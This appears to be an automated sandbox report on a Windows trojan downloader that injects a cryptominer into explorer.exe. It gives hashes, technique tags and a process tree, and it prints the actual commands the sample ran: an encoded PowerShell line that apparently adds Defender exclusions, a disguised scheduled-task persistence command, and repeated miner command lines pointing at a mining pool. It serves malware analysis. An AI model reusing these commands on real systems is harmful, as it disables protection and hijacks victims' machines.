a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6

General

Target

SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe
Size

4.8MB
MD5

b4aa27a1339c69d99121a4fe4fac94f7
SHA1

72cd9ebfd59e9c5a45c22dd5f6aa8d4cb9ba9d26
SHA256

a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6
SHA512

3550565464695370bdc761327eea1502e523a8b5f5780c6d7942e2be480d40a262897009c6e459110ac0b146ad05f69f9c7d099ad88eaca39975907f95d3e184

Score

8^/10

upx

Malware Config

Signatures

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1272-65-0x00000000FF330000-0x00000000FFB1C000-memory.dmp	upx
behavioral1/memory/1272-67-0x00000000FF330000-0x00000000FFB1C000-memory.dmp	upx
behavioral1/memory/1272-69-0x00000000FF330000-0x00000000FFB1C000-memory.dmp	upx
behavioral1/memory/1272-71-0x00000000FF330000-0x00000000FFB1C000-memory.dmp	upx
behavioral1/memory/1272-72-0x00000000FF330000-0x00000000FFB1C000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 40 IoCs

Processes:

SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe

description	pid	process	target process
PID 1728 set thread context of 1272	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1688	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1068	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 756	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1692	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1384	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1952	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 884	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1856	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1876	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1392	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1396	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1048	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1468	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 532	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 840	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 604	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 540	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1456	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 2040	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1896	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1252	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 548	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 960	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1088	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 304	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 528	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1128	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1872	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1284	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 856	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 888	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1536	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1748	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 940	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 648	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1512	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1572	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 1716	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 set thread context of 392	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

568 schtasks.exe
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 4 Go-http-client/1.1
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1632 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1632 powershell.exe

pid	process
568	schtasks.exe

description	flow	ioc
HTTP User-Agent header	4	Go-http-client/1.1

pid	process
1632	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1632	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

SecuriteInfo.com.Trojan.DownLoader44.59135.30418.execmd.exe

description	pid	process	target process
PID 1728 wrote to memory of 940	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	cmd.exe
PID 1728 wrote to memory of 940	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	cmd.exe
PID 1728 wrote to memory of 940	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	cmd.exe
PID 940 wrote to memory of 1632	940	cmd.exe	powershell.exe
PID 940 wrote to memory of 1632	940	cmd.exe	powershell.exe
PID 940 wrote to memory of 1632	940	cmd.exe	powershell.exe
PID 1728 wrote to memory of 568	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	schtasks.exe
PID 1728 wrote to memory of 568	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	schtasks.exe
PID 1728 wrote to memory of 568	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	schtasks.exe
PID 1728 wrote to memory of 1272	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1272	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1272	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1272	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1272	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1272	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1272	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1688	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1688	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1688	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1688	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1688	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1688	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1688	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1068	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1068	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1068	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1068	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1068	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1068	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1068	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 756	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 756	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 756	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 756	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 756	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 756	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 756	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1692	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1692	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1692	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1692	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1692	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1692	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1692	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1384	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1384	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1384	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1384	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1384	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1384	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1384	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1952	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1952	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1952	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1952	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1952	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1952	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 1952	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 884	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 884	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 884	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 884	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 884	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe
PID 1728 wrote to memory of 884	1728	SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
2⤵
- Suspicious use of WriteProcessMemory
PID:940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Runtime Broker" /rl HIGHEST /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker"
2⤵
- Creates scheduled task(s)
PID:568

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1272

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1688

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1068

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:756

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1692

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1384

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1952

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:884

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1856

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1876

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1392

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1396

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1048

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1468

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:532

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:840

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:604

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:540

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1456

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:2040

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1896

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1252

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:548

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:960

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1088

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:304

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:528

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1128

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1872

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1284

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:856

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:888

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1536

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1748

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:940

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:648

C:\Windows\explorer.exe
